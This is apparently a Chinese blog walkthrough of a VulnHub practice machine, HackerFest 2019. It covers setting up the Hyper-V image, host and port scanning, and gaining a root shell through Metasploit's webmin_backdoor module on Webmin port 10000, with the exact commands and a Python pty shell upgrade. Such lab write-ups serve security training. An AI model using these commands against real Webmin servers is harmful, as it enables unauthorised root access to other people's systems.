本周实践的是vulnhub的hackerfest镜像,下载地址,https://download.vulnhub.com/hackerfest/HF2019-Linux.zip,
下载到的压缩包解开后发现磁盘文件是vhdx,明显是个hyper-v的磁盘文件,
先尝试了转成vmdk,但是系统起不来,没办法,只能装个hyper-v了,
再用这个vhdx磁盘文件创建虚机,启动没问题,
接下来的活儿就跟以往实践的流程一致了,
首先进行地址扫描,
sudo netdiscover -r 192.168.137.0/24,这里知道192.168.137.196就是靶机地址,
然后进行端口扫描,最重要的就是10000端口,且开了ssl的webmin,
上metasploit,并且搜跟webmin有关的漏洞利用,webmin_backdoor这个就挺好,
use exploit/linux/http/webmin_backdoor
set RHOSTS 192.168.137.196
set LHOST 192.168.137.83
set SSL true
执行漏洞利用,获取到shell,id一眼,竟然直接就是root,都省的再提权了,也可以python -c 'import pty;pty.spawn("/bin/bash")'一下,转成交互式shell,干啥就都方便了,
这个实践过程很简单,只是前期搭环境费了点儿劲,尝试vhdx转vmdk,以及安装hyper-v,并用vhdx起虚机,都需要有一些实践经验,才能快速搞定靶机环境。
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论